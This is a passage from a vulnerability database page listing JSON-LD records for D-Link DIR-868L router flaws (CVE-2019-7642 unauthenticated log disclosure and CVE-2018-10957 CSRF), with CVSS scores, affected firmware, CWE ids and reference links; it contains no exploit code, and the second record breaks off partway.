Vulnerabilites related to dlink - dir-868l
var-201903-0482
Vulnerability from variot
D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users' DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10). plural D-Link The product contains authentication vulnerabilities.Information may be obtained. D-Link is a company specializing in the design and development of computer network equipment. D-LinkDIR-817LW is a wireless router from D-Link of Taiwan, China. An information disclosure vulnerability exists in the D-Link router. D-Link DIR-817LW, etc. The following products are affected: D-Link DIR-817LW (A1-1.04); DIR-816L (B1-2.06); DIR-816 (B1-2.06); DIR-850L (A1-1.09); 1.10)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0482",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-816",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.06"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10"
},
{
"model": "dir-817lw",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04"
},
{
"model": "dir-816l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.06"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.09"
},
{
"model": "dir-816",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-816l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-817lw",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-868l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-817lw a1-1.04",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-816_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-816l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-817lw_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-850l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
}
]
},
"cve": "CVE-2019-7642",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-7642",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-23343",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-159077",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-7642",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7642",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-7642",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-7642",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2019-23343",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-926",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-159077",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-7642",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link routers with the mydlink feature have some web interfaces without authentication requirements. An attacker can remotely obtain users\u0027 DNS query logs and login logs. Vulnerable targets include but are not limited to the latest firmware versions of DIR-817LW (A1-1.04), DIR-816L (B1-2.06), DIR-816 (B1-2.06?), DIR-850L (A1-1.09), and DIR-868L (A1-1.10). plural D-Link The product contains authentication vulnerabilities.Information may be obtained. D-Link is a company specializing in the design and development of computer network equipment. D-LinkDIR-817LW is a wireless router from D-Link of Taiwan, China. An information disclosure vulnerability exists in the D-Link router. D-Link DIR-817LW, etc. The following products are affected: D-Link DIR-817LW (A1-1.04); DIR-816L (B1-2.06); DIR-816 (B1-2.06); DIR-850L (A1-1.09); 1.10)",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7642",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-23343",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-159077",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7642",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"id": "VAR-201903-0482",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
}
],
"trust": 1.1576200966666665
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
}
]
},
"last_update_date": "2024-11-23T23:11:54.627000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dlink.lt/en/"
},
{
"title": "CVE-2019-7642",
"trust": 0.1,
"url": "https://github.com/xw77cve/cve "
},
{
"title": "CVE-2019-7642",
"trust": 0.1,
"url": "https://github.com/xw77cve/CVE-2019-7642 "
},
{
"title": "PoC",
"trust": 0.1,
"url": "https://github.com/Jonathan-Elias/PoC "
},
{
"title": "CVE-POC",
"trust": 0.1,
"url": "https://github.com/0xT11/CVE-POC "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/nomi-sec/PoC-in-GitHub "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/hectorgie/PoC-in-GitHub "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.1
},
{
"problemtype": "CWE-287",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/xw77cve/cve-2019-7642/blob/master/readme.md"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7642"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7642"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/306.html"
},
{
"trust": 0.1,
"url": "https://github.com/xw77cve/cve"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/nomi-sec/poc-in-github"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"db": "VULHUB",
"id": "VHN-159077"
},
{
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
},
{
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"date": "2019-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-159077"
},
{
"date": "2019-03-25T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"date": "2019-03-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-926"
},
{
"date": "2019-03-25T22:29:00.810000",
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-23343"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-159077"
},
{
"date": "2021-04-23T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7642"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003086"
},
{
"date": "2021-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-926"
},
{
"date": "2024-11-21T04:48:27.040000",
"db": "NVD",
"id": "CVE-2019-7642"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Authentication vulnerabilities in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003086"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-926"
}
],
"trust": 0.6
}
}
var-201805-0686
Vulnerability from variot
CSRF exists on D-Link DIR-868L devices, leading to (for example) a change to the Admin password. hedwig.cgi and pigwidgeon.cgi are two of the affected components. D-Link DIR-868L The device contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-868L is a wireless router product of D-Link. A cross-site request forgery vulnerability exists in the hedwig.cgi and pigwidgeon.cgi files in D-LinkDIR-868L
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0686",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-868l",
"scope": "eq",
"trust": 1.2,
"vendor": "d link",
"version": "1.12"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12"
},
{
"model": "dir-868l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-366"
},
{
"db": "NVD",
"id": "CVE-2018-10957"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004852"
}
]
},
"cve": "CVE-2018-10957",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2018-10957",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-09676",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120768",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-10957",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-10957",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-10957",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-09676",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-366",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120768",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"db": "VULHUB",
"id": "VHN-120768"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-366"
},
{
"db": "NVD",
"id": "CVE-2018-10957"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CSRF exists on D-Link DIR-868L devices, leading to (for example) a change to the Admin password. hedwig.cgi and pigwidgeon.cgi are two of the affected components. D-Link DIR-868L The device contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-868L is a wireless router product of D-Link. A cross-site request forgery vulnerability exists in the hedwig.cgi and pigwidgeon.cgi files in D-LinkDIR-868L",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10957"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"db": "VULHUB",
"id": "VHN-120768"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10957",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "147525",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004852",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-09676",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-366",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120768",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"db": "VULHUB",
"id": "VHN-120768"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-366"
},
{
"db": "NVD",
"id": "CVE-2018-10957"
}
]
},
"id": "VAR-201805-0686",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"db": "VULHUB",
"id": "VHN-120768"
}
],
"trust": 0.06999999999999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09676"
}
]
},
"last_update_date": "2024-11-23T22:55:53.156000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link DIR-868L",
"trust": 0.8,
"url": "https://support.dlink.com/ProductInfo.aspx?m=DIR-868L"
},
{
"title": "Patch for D-LinkDIR-868L Cross-Site Request Forgery Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/129371"
},
{
"title": "D-Link DIR-868L Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=80017"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-366"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120768"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"db": "NVD",
"id": "CVE-2018-10957"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://packetstormsecurity.com/files/147525/d-link-dir-868l-1.12-cross-site-request-forgery.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10957"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10957"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09676"
},
{
"db": "VULHUB",
"id": "VHN-120768"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004852"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-366"
},
{
"db": "NVD",
"id": "CVE-2018-10957"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
